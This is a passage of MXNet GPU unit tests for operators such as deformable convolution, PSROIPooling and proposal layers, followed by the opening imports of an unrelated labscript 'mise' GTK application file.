sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed()
def test_deformable_psroipooling_with_type():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3,
np.dtype(np.float16): 1e-2}
arg_params = {
'deformable_psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# deformable psroipooling
sym = mx.sym.contrib.DeformablePSROIPooling(spatial_scale=0.0625, sample_per_part=4, group_size=3, pooled_size=3,
output_dim=2, trans_std=0.1, no_trans=False, name='deformable_psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
]
check_consistency(sym, ctx_list, scale=0.1, tol=tol,
grad_req={'deformable_psroipool_data': 'write',
'deformable_psroipool_rois': 'null',
'deformable_psroipool_trans': 'write'}, arg_params=arg_params)
@with_seed()
def test_deformable_convolution_with_type():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3}
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), name='deformable_conv')
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, scale=0.1, tol=tol,
grad_req={'deformable_conv_data': 'write',
'deformable_conv_offset': 'write',
'deformable_conv_weight': 'write',
'deformable_conv_bias': 'null'})
@with_seed()
def test_deformable_convolution_options():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3}
# 2D convolution
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
# Pad > 0
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), pad=(1,1), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Stride > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), stride=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Dilate > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Deformable group > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=4, kernel=(3,3), num_deformable_group=2, name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_residual_fused():
cell = mx.rnn.ResidualCell(
mx.rnn.FusedRNNCell(50, num_layers=3, mode='lstm',
prefix='rnn_', dropout=0.5))
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(2)]
outputs, _ = cell.unroll(2, inputs, merge_outputs=None)
assert sorted(cell.params._params.keys()) == \
['rnn_parameters']
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10, 50), rnn_t1_data=(10, 50))
assert outs == [(10, 2, 50)]
outputs = outputs.eval(ctx=mx.gpu(0),
rnn_t0_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
rnn_t1_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
rnn_parameters=mx.nd.zeros((61200,), ctx=mx.gpu(0)))
expected_outputs = np.ones((10, 2, 50))+5
assert np.array_equal(outputs[0].asnumpy(), expected_outputs)
def check_rnn_layer(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
with mx.gpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
co, cs = layer(x, states)
# atol of 1e-6 required, as exposed by seed 2124685726
assert_almost_equal(go.asnumpy(), co.asnumpy(), rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g.asnumpy(), c.asnumpy(), rtol=1e-2, atol=1e-6)
def check_rnn_layer_w_rand_inputs(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
x = mx.nd.uniform(shape=(10, 16, 30))
with mx.gpu(0):
x = x.copyto(mx.gpu(0))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = x.copyto(mx.cpu(0))
states = layer.begin_state(16)
co, cs = layer(x, states)
assert_almost_equal(go.asnumpy(), co.asnumpy(), rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g.asnumpy(), c.asnumpy(), rtol=1e-2, atol=1e-6)
@with_seed()
def test_sequence_reverse():
check_sequence_reverse(mx.gpu(0))
@with_seed()
def test_autograd_save_memory():
x = mx.nd.zeros((128, 512, 512), ctx=mx.gpu(0))
x.attach_grad()
with mx.autograd.record():
for i in range(200):
x = x + 1
x.wait_to_read()
x.backward()
@with_seed()
def test_cuda_rtc():
source = r'''
extern "C" __global__ void axpy(const float *x, float *y, float alpha) {
int i = threadIdx.x + blockIdx.x * blockDim.x;
y[i] += alpha * x[i];
}
extern "C" __global__ void saxpy(const float *x, float *y, float alpha) {
extern __shared__ float smem[];
int i = threadIdx.x + blockIdx.x * blockDim.x;
smem[threadIdx.x] = x[i];
y[i] += alpha * smem[threadIdx.x];
}
'''
module = mx.rtc.CudaModule(source)
axpy = module.get_kernel("axpy", "const float *x, float *y, float alpha")
x = mx.nd.ones((10,), ctx=mx.gpu(0))
y = mx.nd.zeros((10,), ctx=mx.gpu(0))
axpy.launch([x, y, 3.0], mx.gpu(0), (1, 1, 1), (10, 1, 1))
assert (y.asnumpy() == 3).all()
saxpy = module.get_kernel("saxpy", "const float *x, float *y, float alpha")
saxpy.launch([x, y, 4.0], mx.gpu(0), (1, 1, 1), (10, 1, 1), 10)
assert (y.asnumpy() == 7).all()
saxpy.launch([x, y, 5.0], mx.gpu(0), (2, 1, 1), (5, 1, 1), 5)
assert (y.asnumpy() == 12).all()
@with_seed()
def test_cross_device_autograd():
x = mx.nd.random.uniform(shape=(10,))
x.attach_grad()
with mx.autograd.record():
y = mx.nd.tanh(x)
y = y.copyto(mx.gpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.cpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.gpu(0))
y = y.copyto(mx.gpu(0))
y.backward()
dx = x.grad.asnumpy()
x.grad[:] = 0
with mx.autograd.record():
y = x
for i in range(3):
y = mx.nd.tanh(y)
y.backward()
assert_almost_equal(dx, x.grad.asnumpy())
@with_seed()
def test_multi_proposal_op():
# paramters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
rpn_min_size = feature_stride
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
def get_new_data(batch_size, ctx):
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
dtype = np.float32
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = dtype, ctx = ctx)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = dtype, ctx = ctx)
im_info = mx.nd.empty((batch_size, 3), dtype = dtype, ctx = ctx)
cls = [1.0 * (i + 1) / cls_prob.size for i in range(cls_prob.size)]
np.random.shuffle(cls)
cls_prob = mx.nd.reshape(mx.nd.array(cls, dtype = dtype, ctx = ctx), shape = cls_prob.shape)
bbox_pred = mx.nd.array(np.random.randint(-2, 3, size = bbox_pred.shape), dtype = dtype, ctx = ctx)
for i in range(batch_size):
im_size = np.random.randint(600, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(80, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
return cls_prob, bbox_pred, im_info
def check_proposal_consistency(op, batch_size, with_nms=False):
'''
op is mx.nd.contrib.Proposal or mx.nd.contrib.MultiProposal
'''
cls_prob, bbox_pred, im_info = get_new_data(batch_size, mx.cpu(0))
rois_cpu, score_cpu = op(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
gpu_ctx = mx.gpu(0)
# copy data to gpu from cpu
cls_prob_gpu = cls_prob.as_in_context(gpu_ctx)
bbox_pred_gpu = bbox_pred.as_in_context(gpu_ctx)
im_info_gpu = im_info.as_in_context(gpu_ctx)
rois_gpu, score_gpu = op(
cls_prob = cls_prob_gpu,
bbox_pred = bbox_pred_gpu,
im_info = im_info_gpu,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
rois_cpu_np = rois_cpu.asnumpy()
rois_gpu_np = rois_gpu.asnumpy()
score_cpu_np = score_cpu.asnumpy()
score_gpu_np = score_gpu.asnumpy()
if not with_nms:
assert_almost_equal(score_cpu_np, score_gpu_np, atol = 1e-3, rtol = 1e-3)
assert_almost_equal(rois_cpu_np, rois_gpu_np, atol = 1e-3, rtol = 1e-3)
else:
# no 100% gurantee with nms
assert(np.sum(np.abs(score_cpu_np - score_gpu_np) < 1e-3) >= 10)
assert(np.sum(np.abs(rois_cpu_np - rois_gpu_np) < 1e-3) >= 40)
check_proposal_consistency(mx.nd.contrib.Proposal, 1)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5)
check_proposal_consistency(mx.nd.contrib.Proposal, 1, with_nms=True)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5, with_nms=True)
# The following 2 functions launch 0-thread kernels, an error that should be caught and signaled.
def kernel_error_check_imperative():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
with mx.np_shape(active=True):
a = mx.nd.array([1,2,3],ctx=mx.gpu(0))
b = mx.nd.array([],ctx=mx.gpu(0))
c = (a / b).asnumpy()
def kernel_error_check_symbolic():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
with mx.np_shape(active=True):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
c = a / b
f = c.bind(mx.gpu(0), { 'a':mx.nd.array([1,2,3],ctx=mx.gpu(0)),
'b':mx.nd.array([],ctx=mx.gpu(0))})
f.forward()
g = f.outputs[0].asnumpy()
def test_kernel_error_checking():
# Running tests that may throw exceptions out of worker threads will stop CI testing
# if not run in a separate process (with its own address space for CUDA compatibility).
try:
mpctx = mp.get_context('spawn')
except:
print('SKIP: python%s.%s lacks the required process fork-exec support ... ' %
sys.version_info[0:2], file=sys.stderr, end='')
else:
with discard_stderr():
for f in [kernel_error_check_imperative, kernel_error_check_symbolic]:
p = mpctx.Process(target=f)
p.start()
p.join()
assert p.exitcode != 0,\
"Expected a synchronous kernel error from %s(), none seen." % f.__name__
def test_incorrect_gpu():
# Try setting dev_id to a really big number
assert_raises(MXNetError, mx.nd.ones, (2,2), ctx=mx.gpu(100001))
@with_seed()
def test_batchnorm_backwards_notrain():
for ctx in [mx.cpu(0), mx.gpu(0)]:
for cudnn_o in [False, True]:
B,C,H,W = 4,3,2,2
x = mx.nd.random.poisson(1,shape=(B,C,H,W)).as_in_context(ctx)
gamma = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
beta = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
mean = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
std = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
x.attach_grad()
with autograd.record(False):
y = mx.ndarray.BatchNorm(x, gamma, beta, mean, std.square(),
fix_gamma=False, cudnn_off=cudnn_o)
loss=y.square().sum()
loss.backward(train_mode=False)
@with_seed()
def test_create_sparse_ndarray_gpu_to_cpu():
dim0 = 10
dim1 = 5
densities = [0, 0.5, 1]
for density in densities:
shape = rand_shape_2d(dim0, dim1)
matrix = rand_ndarray(shape, 'row_sparse', density)
data = matrix.data
indices = matrix.indices
rsp_created = mx.nd.sparse.row_sparse_array((data, indices), shape=shape, ctx=mx.cpu())
assert rsp_created.stype == 'row_sparse'
assert same(rsp_created.data.asnumpy(), data.asnumpy())
assert same(rsp_created.indices.asnumpy(), indices.asnumpy())
rsp_copy = mx.nd.array(rsp_created)
assert(same(rsp_copy.asnumpy(), rsp_created.asnumpy()))
@with_seed()
def test_softmax_activation():
gpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.gpu(0))
cpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.cpu())
cpu_a.attach_grad()
gpu_a.attach_grad()
with mx.autograd.record():
gpu_y = mx.nd.SoftmaxActivation(data = gpu_a)
cpu_y = mx.nd.SoftmaxActivation(data = cpu_a)
assert_almost_equal(cpu_y.asnumpy(), gpu_y.asnumpy(), atol = 1e-3, rtol = 1e-3)
gpu_y.backward()
cpu_y.backward()
assert_almost_equal(cpu_a.grad.asnumpy(), gpu_a.grad.asnumpy(),
atol = 1e-3, rtol = 1e-3)
@with_seed()
def test_bilinear_sampler_versions():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym1 = mx.sym.BilinearSampler(data=data, grid=grid)
sym2 = mx.sym.BilinearSampler(data=data, grid=grid, cudnn_off=True)
sym3 = mx.sym.BilinearSampler(data=data, grid=grid)
test_cases = [[(1,3,15,16),(1,2,10,10)],
[(1,6,7,16),(1,2,10,4)],
[(1,7,3,16),(1,2,8,11)],
[(1,9,50,50),(1,2,50,50)]]
for item in test_cases:
data_shape, grid_shape = item
# kWriteTo
exe_cpu = sym1.simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req='write')
exe_gpu = sym2.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='write')
exe_cudnn = sym3.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='write')
exe_list = [exe_cpu, exe_gpu, exe_cudnn]
ref_idx = 0
test_data = np.random.uniform(low=-0.1, high=0.1,size=data_shape).astype(np.float32)
test_grid = np.random.uniform(low=-2, high=2, size=grid_shape).astype(np.float32)
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.forward(is_train=True)
assert_almost_equal(exe_list[ref_idx].outputs[0].asnumpy(), exe.outputs[0].asnumpy(), rtol=1e-3, atol=1e-5)
out_grad = np.random.uniform(low=-0.01, high=0.01,size=data_shape[:2] + grid_shape[2:]).astype(np.float32)
for exe in exe_list:
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['data'].asnumpy(), exe_list[ref_idx].grad_dict['data'].asnumpy(), rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_dict['grid'].asnumpy(), exe_list[ref_idx].grad_dict['grid'].asnumpy(), rtol=1e-3, atol=1e-5)
data_grad = exe_list[ref_idx].grad_dict['data'].asnumpy()
grid_grad = exe_list[ref_idx].grad_dict['grid'].asnumpy()
# kAddTo
exe_cpu_addto = sym1.simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req='add')
exe_gpu_addto = sym2.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='add')
exe_cudnn_addto = sym3.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='add')
exe_list = [exe_cpu_addto, exe_gpu_addto, exe_cudnn_addto]
data_initial_grad = np.random.normal(size=exe_list[ref_idx].grad_dict['data'].shape).astype(np.float32)
grid_initial_grad = np.random.normal(size=exe_list[ref_idx].grad_dict['grid'].shape).astype(np.float32)
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.grad_dict['data'][:] = data_initial_grad
exe.grad_dict['grid'][:] = grid_initial_grad
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['data'].asnumpy(), exe_list[ref_idx].grad_dict['data'].asnumpy(), rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_dict['grid'].asnumpy(), exe_list[ref_idx].grad_dict['grid'].asnumpy(), rtol=1e-3, atol=1e-5)
assert_almost_equal(exe_list[ref_idx].grad_dict['data'].asnumpy(), data_grad + data_initial_grad, rtol=1e-3, atol=1e-5)
assert_almost_equal(exe_list[ref_idx].grad_dict['grid'].asnumpy(), grid_grad + grid_initial_grad, rtol=1e-3, atol=1e-5)
for req_dict in [{'data' : 'null', 'grid' : 'write'}, {'data' : 'write', 'grid' : 'null'}]:
# Mixture of kWriteTo and kNullOp
exe_cpu_mix = sym1.simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req=req_dict)
exe_gpu_mix = sym2.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req=req_dict)
exe_cudnn_mix = sym3.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req=req_dict)
exe_list = [exe_cpu_mix, exe_gpu_mix, exe_cudnn_mix]
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
if req_dict['data'] is 'write':
assert_almost_equal(exe.grad_dict['data'].asnumpy(), exe_list[ref_idx].grad_dict['data'].asnumpy(), rtol=1e-3, atol=1e-5)
if req_dict['grid'] is 'write':
assert_almost_equal(exe.grad_dict['grid'].asnumpy(), exe_list[ref_idx].grad_dict['grid'].asnumpy(), rtol=1e-3, atol=1e-5)
# isolated execution bulking test function to be invoked with different env var settings
def _test_bulking_in_process(seed, time_per_iteration):
data_shape = (10,)
num_ops = 1000
num_iterations = 20
ctx = default_context()
# build symbol
X = mx.sym.Variable('X')
sym = mx.sym.flip(X, axis=0)
for _ in range(num_ops-1):
sym = mx.sym.flip(sym, axis=0)
x = mx.ndarray.zeros(data_shape)
dx = mx.ndarray.zeros(data_shape)
dy = mx.ndarray.ones(data_shape)
exe = sym.bind(ctx=ctx, args=[x], args_grad = {'X':dx})
# time a number of forward() and backward() executions after some warm-up iterations
warmups = 1
for i in range(num_iterations+warmups):
if i == warmups:
start = time.time()
exe.forward(is_train=True)
exe.backward(dy)
dx.wait_to_read()
time_per_iteration.value = (time.time() - start) / num_iterations
@with_seed()
@unittest.skip('skippping temporarily, tracked by https://github.com/apache/incubator-mxnet/issues/14970')
def test_bulking():
# test case format: (max_fwd_segment_size, max_bwd_segment_size, enable_bulking_in_training)
test_cases = [(0,0,True), (1,1,True), (15,15,False), (15,0,True), (0,15,True), (15,15,True)]
times = {}
times_str = ''
for seg_sizes in test_cases:
# Create shared variable to return measured time from test process
time_per_iteration = mp.Manager().Value('d', 0.0)
if not run_in_spawned_process(_test_bulking_in_process,
{'MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_FWD' : seg_sizes[0],
'MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_BWD' : seg_sizes[1],
'MXNET_EXEC_BULK_EXEC_TRAIN' : seg_sizes[2]},
time_per_iteration):
# skip test since the python version can't run it properly. Warning msg was logged.
return
times[seg_sizes] = time_per_iteration.value
times_str += \
'\n runtime of (fwd,bwd,enable) op seg setting ({},{},{}) =\t{:.1f} msec'.format(
seg_sizes[0], seg_sizes[1], seg_sizes[2], 1000.0 * times[seg_sizes])
fastest_non_bulked_time = min(times[(0,0,True)], times[(1,1,True)], times[(15,15,False)])
slowest_half_bulked_time = max(times[(0,15,True)], times[(15,0,True)])
fastest_half_bulked_time = min(times[(0,15,True)], times[(15,0,True)])
fully_bulked_time = times[(15,15,True)]
print(times_str)
# Non-bulked times[0,0,True], times[1,1,True] and times[15,15,False] should be about the same,
# slower than both half-bulked times[0,15,True] and times[15,0,True]
assert slowest_half_bulked_time < fastest_non_bulked_time, \
'A half-bulked exec time is slower than the non-bulked time by {} secs! {}' \
.format(slowest_half_bulked_time - fastest_non_bulked_time, times_str)
# The fully bulked times[15,15,True] should be faster than both half-bulked runs
assert fully_bulked_time < fastest_half_bulked_time, \
'The fully-bulked exec time is slower than a half-bulked time by {} secs! {}' \
.format(fully_bulked_time - fastest_half_bulked_time, times_str)
def test_context_num_gpus():
# Test that num_gpus reports at least one GPU, as the test is run on a GPU host.
assert mx.context.num_gpus() > 0
def math_log(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.log(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.log(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def math_erf(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.erf(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.erf(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def math_square(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.square(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.square(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def run_math(op, shape, dtype="float32", check_value=True):
run_num = 10
for i in range(run_num):
if op == 'log':
math_log(shape=shape, dtype=dtype, check_value=check_value)
elif op == 'erf':
math_erf(shape=shape, dtype=dtype, check_value=check_value)
elif op == 'square':
math_square(shape=shape, dtype=dtype, check_value=check_value)
@with_seed()
def test_math():
ops = ['log', 'erf', 'square']
check_value= True
shape_lst = [[1000], [100,1000], [10,100,100], [10,100,100,100]]
dtypes = ["float32", "float64"]
for shape in shape_lst:
for dtype in dtypes:
for op in ops:
run_math(op, shape, dtype, check_value=check_value)
if __name__ == '__main__':
import nose
nose.runmodule()
|
main.pyw
|
#####################################################################
# #
# /main.pyw #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the program mise, in the labscript suite #
# (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
from __future__ import division
import os
import sys
import socket
import logging, logging.handlers
import Queue
import itertools
import subprocess
import threading
import urllib, urllib2
import numpy
import gtk, gobject
import zprocess.locking, labscript_utils.h5_lock, h5py
import labscript_utils.excepthook
from zprocess import ZMQServer, subprocess_with_queues, zmq_get
from labscript_utils.gtk_outputbox import OutputBox
from labscript_utils.labconfig import LabConfig, config_prefix
import labscript_utils.shared_drive
import runmanager
from mise import MiseParameter
# This provides debug info without having to run from a terminal, and
# avoids a stupid crash on Windows when there is no command window:
if not sys.stdout.isatty():
sys.stdout = sys.stderr = open('debug.log','w',1)
# Set a meaningful name for zprocess.locking's client id:
zprocess.locking.set_client_process_name('mise')
if os.name == 'nt':
# Make it not look so terrible (if icons and themes are installed):
gtk.settings_get_default().set_string_property('gtk-icon-theme-name','gnome-human','')
